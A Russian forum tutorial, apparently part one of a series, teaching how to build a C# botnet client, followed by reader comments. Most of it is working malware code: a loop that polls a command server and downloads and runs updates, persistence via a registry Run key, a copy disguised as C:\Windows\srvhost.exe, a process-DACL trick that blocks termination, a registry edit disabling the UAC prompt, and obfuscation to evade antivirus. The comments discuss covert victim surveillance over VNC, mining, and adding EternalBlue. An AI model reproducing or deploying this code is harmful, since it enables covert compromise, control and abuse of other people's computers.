Статья Создаем свой ботнет

Часть 1
Часть 2 находится тут

Добрый вечер господа. Сегодня я хотел бы поговорить не о взломе в чистом виде. Я думаю пришло время нам с Вами создать собственный БОТНЕТ. Эта тема, является не новой, но я бы хотел обратить внимание на то как именно начать создавать ботнет. Я уже являюсь ботоделом. И вот так выглядит, то что уже написано.

upload_2016-12-19_1-16-35.png


Ну что, пожалуй сразу к делу?

Ботнет будем строить на языке C# - так как этот лучший выбор для НЕБОЛЬШИХ Ботнетов (максимум 100к онлайн машин). Это связано с одним ограничением, что для работы бота у жертвы должен быт установлен .Net Framework – сегодня в эпоху Windows 10, это уже не является большой проблемой, однако знать об этом стоит.

Теперь же поговорим о главном, а именно о том, с чего начинают новички и как НЕ НАДО начинать. (По разрушаем некоторые мифы)

Миф 1: Крутой ботнет должен содержать много всяких плюшек (DDOS, лайки в вк, вызов калькулятора =)).

Опровергаем: Хороший ботнет это тот, который не падает и справляется со своей задачей. Поэтому, как и любой продукт сначала необходимо писать МИНИМАЛЬНО - НЕОБХОДИМЫЙ функционал, так как программиста очень тяжело остановить и ему хочется писать всё больше и больше кода. Это неправильно. Написать необходимо сначала каркас и возможность расширения функционала. Этим путем пойдем и мы. Ботнет должен работать сразу и писаться максимум за два – три дня.

Миф 2: Ботнет обязательно для DDOS – атак.

Опровергаем: Это тоже не верное суждение. Да, ботнеты обычно используются для DDOS атак и мы рассмотрим типы DDOS атак и даже напишем свои модули, но не это главное. Лично я использую ботнет для распределенного быстрого подбора хеш функций, брута сервисов и т.п. Так как согласитесь, на сколько бы быстрый не был бы Ваш процессор, 100 000 машин сбрутят быстрее чем 1 машина. И это лишь немногое, как его можно использовать

Миф 3: Написать ботнет – сложно и требует клоссальных знаний программирования и сетевых технологий.

Опровергаем: Отчасти это так, но на самом деле не нужно быть выдающимся программистом с великим стажем. Хватит понимания общих сетевых протоколов (такие HTTP), немного знаний криптографии (SSL), и уровень программирования хотя бы на понимание ООП.

Итак, что же такое ботнет? Это несколько машин, объединённых одним командным центром, для скрытой эксплуатации ресурсов выгодных владельцу ботнета.

Пожалуй, хватит разговоров, пора к делу:

Требования к сегодняшнему релизу:
1) Создать билд который по указанному пути будет брать команду для ботов
2) Реализовать возможность копирования самого себя в автозагрузку и на этой стадии ограничимся копированием билда в другом каталог.
3) ByPass Uac и AV
4) Запретить завершение процесса.
5) Реализовать поддержку первый команды «Update» - команда которая просто будет обновлять наш текущий клиент, новой версией.
6) Небольшую обфускацию исходников, чтобы нас не отреверсили так просто.

Понеслась….

Создаем новый консольный проект.

upload_2016-12-19_1-21-25.png


Далее меняем в настройках проекта на приложение для Windows (Лайвхак, чтобы создать пустое приложение без поддержки телеметрии).

upload_2016-12-19_1-21-43.png


А вот теперь переходим в вопросы архитектуры.

Создаем папку Services в которой будет хранится наша бизнес логика и при добавлении новых возможностей в эту папку будем добавлять папки с новыми сервисами и классами. Начнем с первого пункта ТЗ. Создаим сервис «FileManager», который будет читать команду по ссылке, а также интерфейс.

upload_2016-12-19_1-22-24.png


Далее код, для начала создадим заглушку на командном сервере (index.php).
PHP:
<?php
echo 'update';

Вспоминаем наше ТЗ
Создать билд, который по указанному пути будет брать команду для ботов
Для этого в наш сервис добавляем следующий код
Код:
public class FileManager : IFileManager
    {
        public string GetCommandByUrl(string url)
        {
            HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
            HttpWebResponse response = (HttpWebResponse)request.GetResponse();
            return new StreamReader(response.GetResponseStream()).ReadToEnd();
        }

  }
А в программу добавим
Код:
private static string _url = @"URL/index.php"; (тут наша заглушка пока)
     private const int interval = 10000; // 1000 seconds ~ 16 minutes
            while (true)
            {
                Thread.Sleep(interval);
                var command = _fileService.GetCommandByUrl(_url);

                if (command.Equals("update"))
                {
                    WebClient myWebClient = new WebClient();
                    myWebClient.DownloadFile(_url, "update.exe");
                    _fileService.RemoveFile();
                    _fileService.CopyFile("update.exe");
                }
          }
Профит:
upload_2016-12-19_1-24-57.png


Реализовать возможность копирования самого себя в автозагрузку и на этой стадии ограничимся копированием билда в другом каталог.
Создаем в FileManager новый метод
Код:
public void CopyFile(string fileName = "")
        {
            if (String.IsNullOrEmpty(fileName))
            {
                fileName = Assembly.GetExecutingAssembly().Location;
                return;
            }

            File.Copy(fileName, @"C:\Windows\srvhost.exe");
        }
void CopyFile(string fileName = @"C:\Windows\srvhost.exe");
Добавляем в Program.cs
Код:
   public static void Main(string[] args)
        {
            IFileManager _fileService = new FileManager();
            _fileService.CopyFile();
RegistryKey rkApp = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
            rkApp.SetValue("MyApp", @"C:\Windows\srvhost.exe");
Запретить завершение процесса;
Здесь тоже всё достаточно просто новый сервис и добавляем в Program proc.block
Глянем в ProcessManager
Код:
  public class ProcessManager
    {
        [DllImport("advapi32.dll", SetLastError = true)]
        static extern bool GetKernelObjectSecurity(IntPtr Handle, int securityInformation, [Out] byte[] pSecurityDescriptor,
uint nLength, out uint lpnLengthNeeded);

        public static RawSecurityDescriptor GetProcessSecurityDescriptor(IntPtr processHandle)
        {
            const int DACL_SECURITY_INFORMATION = 0x00000004;
            byte[] psd = new byte[0];
            uint bufSizeNeeded;
            // Call with 0 size to obtain the actual size needed in bufSizeNeeded
            GetKernelObjectSecurity(processHandle, DACL_SECURITY_INFORMATION, psd, 0, out bufSizeNeeded);
            if (bufSizeNeeded < 0 || bufSizeNeeded > short.MaxValue)
                throw new Win32Exception();
            // Allocate the required bytes and obtain the DACL
            if (!GetKernelObjectSecurity(processHandle, DACL_SECURITY_INFORMATION,
            psd = new byte[bufSizeNeeded], bufSizeNeeded, out bufSizeNeeded))
                throw new Win32Exception();
            // Use the RawSecurityDescriptor class from System.Security.AccessControl to parse the bytes:
            return new RawSecurityDescriptor(psd, 0);
        }

        [DllImport("advapi32.dll", SetLastError = true)]
        static extern bool SetKernelObjectSecurity(IntPtr Handle, int securityInformation, [In] byte[] pSecurityDescriptor);

        public static void SetProcessSecurityDescriptor(IntPtr processHandle, RawSecurityDescriptor dacl)
        {
            const int DACL_SECURITY_INFORMATION = 0x00000004;
            byte[] rawsd = new byte[dacl.BinaryLength];
            dacl.GetBinaryForm(rawsd, 0);
            if (!SetKernelObjectSecurity(processHandle, DACL_SECURITY_INFORMATION, rawsd))
                throw new Win32Exception();
        }

        [DllImport("kernel32.dll")]
        public static extern IntPtr GetCurrentProcess();

        [Flags]
        public enum ProcessAccessRights
        {
            PROCESS_CREATE_PROCESS = 0x0080, //  Required to create a process.
            PROCESS_CREATE_THREAD = 0x0002, //  Required to create a thread.
            PROCESS_DUP_HANDLE = 0x0040, // Required to duplicate a handle using DuplicateHandle.
            PROCESS_QUERY_INFORMATION = 0x0400, //  Required to retrieve certain information about a process, such as its token, exit code, and priority class (see OpenProcessToken, GetExitCodeProcess, GetPriorityClass, and IsProcessInJob).
            PROCESS_QUERY_LIMITED_INFORMATION = 0x1000, //  Required to retrieve certain information about a process (see QueryFullProcessImageName). A handle that has the PROCESS_QUERY_INFORMATION access right is automatically granted PROCESS_QUERY_LIMITED_INFORMATION. Windows Server 2003 and Windows XP/2000:  This access right is not supported.
            PROCESS_SET_INFORMATION = 0x0200, //    Required to set certain information about a process, such as its priority class (see SetPriorityClass).
            PROCESS_SET_QUOTA = 0x0100, //  Required to set memory limits using SetProcessWorkingSetSize.
            PROCESS_SUSPEND_RESUME = 0x0800, // Required to suspend or resume a process.
            PROCESS_TERMINATE = 0x0001, //  Required to terminate a process using TerminateProcess.
            PROCESS_VM_OPERATION = 0x0008, //   Required to perform an operation on the address space of a process (see VirtualProtectEx and WriteProcessMemory).
            PROCESS_VM_READ = 0x0010, //    Required to read memory in a process using ReadProcessMemory.
            PROCESS_VM_WRITE = 0x0020, //   Required to write to memory in a process using WriteProcessMemory.
            DELETE = 0x00010000, // Required to delete the object.
            READ_CONTROL = 0x00020000, //   Required to read information in the security descriptor for the object, not including the information in the SACL. To read or write the SACL, you must request the ACCESS_SYSTEM_SECURITY access right. For more information, see SACL Access Right.
            SYNCHRONIZE = 0x00100000, //    The right to use the object for synchronization. This enables a thread to wait until the object is in the signaled state.
            WRITE_DAC = 0x00040000, //  Required to modify the DACL in the security descriptor for the object.
            WRITE_OWNER = 0x00080000, //    Required to change the owner in the security descriptor for the object.
            STANDARD_RIGHTS_REQUIRED = 0x000f0000,
            PROCESS_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED | SYNCHRONIZE | 0xFFF),//    All possible access rights for a process object.
        }
        public void block()
        {
            // Get the current process handle
            IntPtr hProcess = GetCurrentProcess();
            // Read the DACL
            var dacl = GetProcessSecurityDescriptor(hProcess);
            // Insert the new ACE
            dacl.DiscretionaryAcl.InsertAce(
            0,
            new CommonAce(
            AceFlags.None,
            AceQualifier.AccessDenied,
            (int)ProcessAccessRights.PROCESS_ALL_ACCESS,
            new SecurityIdentifier(WellKnownSidType.WorldSid, null),
            false,
            null)
            );
            // Save the DACL
            SetProcessSecurityDescriptor(hProcess, dacl);
        }
    }
Теперь наш процесс сможет убить только опытный пользователь.

Профит: При нажатии на кнопку снять задачу получаем.

upload_2016-12-19_1-27-45.png


Для того чтобы забайпассить UAC нужно в реестре просто отключить его проверку.
Код:
var readWriteSubTree = Microsoft.Win32.RegistryKeyPermissionCheck.ReadWriteSubTree;
            Microsoft.Win32.RegistryKey key = Microsoft.Win32.Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
                , readWriteSubTree);
            key.SetValue("ConsentPromptBehaviorAdmin", 0);
Байпассить AV на этом этапе пока не нужно, так как билд чистый, сигнатуры неизвестны, антивирусы не видят.

upload_2016-12-19_1-30-34.png


Скан здесь

Реализовать поддержку первый команды «Update» - команда которая просто будет обновлять наш текущий клиент, новой версией.

Код:
  if (command.Equals("update"))
                {
                    WebClient myWebClient = new WebClient();
                    myWebClient.DownloadFile(_url, "update.exe");
                    _fileService.RemoveFile();
                    _fileService.CopyFile("update.exe");
                }

Небольшую обфускацию исходников, чтобы нас не отреверсили так просто.
Качаем .Net Reactor и ставим Protect. В дальнейших статьях рассмотрим собственные обфускаторы с помощью рефлексии.

upload_2016-12-19_1-33-56.png


Сравним обфусцированный и необфусцированный билды

Видим как билд палится без проблем

upload_2016-12-19_1-34-10.png


Вспоминаем наш метод Main, который теперь вот так выглядит в dotPeek

upload_2016-12-19_1-34-40.png


Всем спасибо. На этом всё. Посмотрим, зайдет ли кодерская статья у публики, и решим продолжать эту тему или нет. Во всяком случае в статье собраны так же инетересные техники байпасса, немного рефлексии.

 
B

BaJIepraH

Хорошая идея я обращу на это внимание
ну и если в планы входит-как лучше и где правильнее зашустрить админку,вроде как-хорошенькое дело говорят в торе ныкать,но так и не безопасно же ни разу. смотри сам конечно,но лично я бы сутками твои курсы смотрел от А до Я,а посему - интересно всё
 

SooLFaa

Platinum
15.07.2016
898
1 560
BIT
36
ну и если в планы входит-как лучше и где правильнее зашустрить админку,вроде как-хорошенькое дело говорят в торе ныкать,но так и не безопасно же ни разу. смотри сам конечно,но лично я бы сутками твои курсы смотрел от А до Я,а посему - интересно всё
Нееее, чтобы в торе от всех машин трафик шифровать - это рехнешься. Проще через RSA гонять, приватный ключ на сервере хранить, а паблик кеем шифровать сообщение у бота. Да и в принципе инфа то не секретная. Самое сложное, что я вижу в разработке ботнета - это как сделать так, чтобы путь к админке не лежал в самом боте, для этого была придумана p2p архитектура, которую, в силу сложности реализации, мы пока рассматривать не будем, если только позже когда уже подойдем к этому уровню.
 
B

BaJIepraH

Нееее, чтобы в торе от всех машин трафик шифровать - это рехнешься. Проще через RSA гонять, приватный ключ на сервере хранить, а паблик кеем шифровать сообщение у бота. Да и в принципе инфа то не секретная. Самое сложное, что я вижу в разработке ботнета - это как сделать так, чтобы путь к админке не лежал в самом боте, для этого была придумана p2p архитектура, которую, в силу сложности реализации, мы пока рассматривать не будем, если только позже когда уже подойдем к этому уровню.
p2p это же вроде как в торренте и луковице соединение?я в таком разе даже по мануалу бы с месяцок сидел тупил))) а вообще озадачил,точнее заострил внимание,я всё очковал криптографии касаться в силу того что я нубас,максимум с чем связывался-через китайфон отправлял на йух сертификаты и сниффал ссл трафик,но теперь в силу уже необходимости пошёл открывать отложенные ранее материалы по этой теме и вникать по полной.
Всех с наступающим! надеюсь,что у всех,у кого минувший год прополз как гумозник вымораживающий,предстоящий год пройдёт успешно,со всеми компенсациями и бонусами за этого утырка! :)

UPD
забыл у ТС спросить по поводу VNC в дотнет,а именно для её реализации мне нужно банально через сервисы подпихивать клиент и по царскому желанию палить пассажира с сервака?или же тут тоже не всё так просто и нужно такие сессии по особенному ныкать?в таком разе расклад даже интереснее,в плане - я бы хотел палить пассажира с его учётки,но чтобы он не мог палить мои действия/хотя бы не палил то,что я за ним палю.Возможно ли?Понятно что есть гость и возможность создать свою админ учётку и сныкать её,но у меня есть определенный интерес шалить именно с его учётки. Конечно же против заныканного акка ничего против не имею,но всё же?
 
Последнее редактирование модератором:

SooLFaa

Platinum
15.07.2016
898
1 560
BIT
36
сорри за флуд,редактировать через 30 мин не дают,но у меня тут:
UPD
забыл у ТС спросить по поводу VNC в дотнет,а именно для её реализации мне нужно банально через сервисы подпихивать клиент и по царскому желанию палить пассажира с сервака?или же тут тоже не всё так просто и нужно такие сессии по особенному ныкать?в таком разе расклад даже интереснее,в плане - я бы хотел палить пассажира с его учётки,но чтобы он не мог палить мои действия/хотя бы не палил то,что я за ним палю.Возможно ли?Понятно что есть гость и возможность создать свою админ учётку и сныкать её,но у меня есть определенный интерес шалить именно с его учётки. Конечно же против заныканного акка ничего против не имею,но всё же?
Из того, что я попытался понять, ты имеешь ввиду удаленное управление. В своей разработке тихий режим teamviewer'a еще давно был ресерч на эту тему. А VNC подбрасывать тоже как вариант, подумаю над этим.
 
V

vlad2211

может видео сделаешь на счет бота?
 
B

BaJIepraH

может видео сделаешь на счет бота?
в личку бомби,я помогу,го лучше 2ую часть :)))
[doublepost=1483136717,1483101963][/doublepost]да и вообще про видео спрашивать это привилегия чувака с моего аватара :)
ТС порадуй круг своих читаталей перед грядущим праздником,сделай так чтобы они остались дома и отключили телефоны :)
 

SooLFaa

Platinum
15.07.2016
898
1 560
BIT
36
в личку бомби,я помогу,го лучше 2ую часть :)))
[doublepost=1483136717,1483101963][/doublepost]да и вообще про видео спрашивать это привилегия чувака с моего аватара :)
ТС порадуй круг своих читаталей перед грядущим праздником,сделай так чтобы они остались дома и отключили телефоны :)
Будет вторая часть. Скор осовсем. Завтра думаю выложу до Нового года.
 
I

in1rovert

никогда бы не подумал, что за C# когда-нибудь возьмусь...но сегодня призадумался..
посмотрим как пойдет.)
...
Благодарствую за тему
 

Сергей Попов

Кодебай
30.12.2015
4 718
6 707
BIT
366
5. Условия и правила создания тем и сообщений, размещение других информационных материалов (фото, видео)
2. При создании сообщения необходимо учитывать специфику такой формы общения, как конференция, и четко понимать ее отличие от чата. В конференции все сообщения хранятся неограниченное время, в то время как в чате они существуют лишь в течение нескольких часов. Поэтому в конференции принято создавать сообщения, представляющие не сиюминутный интерес (особенно только для отдельных участников), а сообщения, которые интересно будет читать всем посетителям даже через несколько месяцев после их написания.​
 
  • Нравится
Реакции: BaJIepraH
Р

РЫЦАРЬТАЩИТ

А как байпасить UAC, если доступ запрещен к полям этих политик в HKLC?
 
P

pavelpasha

Не могу понять почему Process.block не работает корректно. При запуске дебага в Visual Studio, и попытке остановить дебаг, студия подвисает и ошибку что "Процесс нельзя завершить", однако спустя время процесс все-равно умирает. НО! при запуске скомпилированного билда, он завершается через диспетчер вообще без проблем.
А, я понял. Прочитал в соседней теме что на 10 этот способ не работает. Какие еще есть способы защитить процесс?
 
Последнее редактирование модератором:

SooLFaa

Platinum
15.07.2016
898
1 560
BIT
36
Начинаю работу над третьей частью. Третья часть будет полностью готовый клиент. С присобаченным етерналблю. Типа ванакрая и уметь только три фитчи. Первая это апдейтиться Вторая выполнять cmd команду. Админку будем делать в стелс режиме.
 

bluntman

Green Team
07.09.2017
12
2
BIT
4
Статья натолкнула на вопрос: а теоретически возможно использовать ботнет для добычи криптовалюты впринципе?
 

Elektrolife

Green Team
21.10.2016
208
33
BIT
25
Начинаю работу над третьей частью. Третья часть будет полностью готовый клиент. С присобаченным етерналблю. Типа ванакрая и уметь только три фитчи. Первая это апдейтиться Вторая выполнять cmd команду. Админку будем делать в стелс режиме.


Эх,я бы затестил )) А для заражения используется какой то свой билд,или можно как то прикрутить заражение через различные файлы с payload ? Например С@С увидел реверс и сразу насыпал туда список действий
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!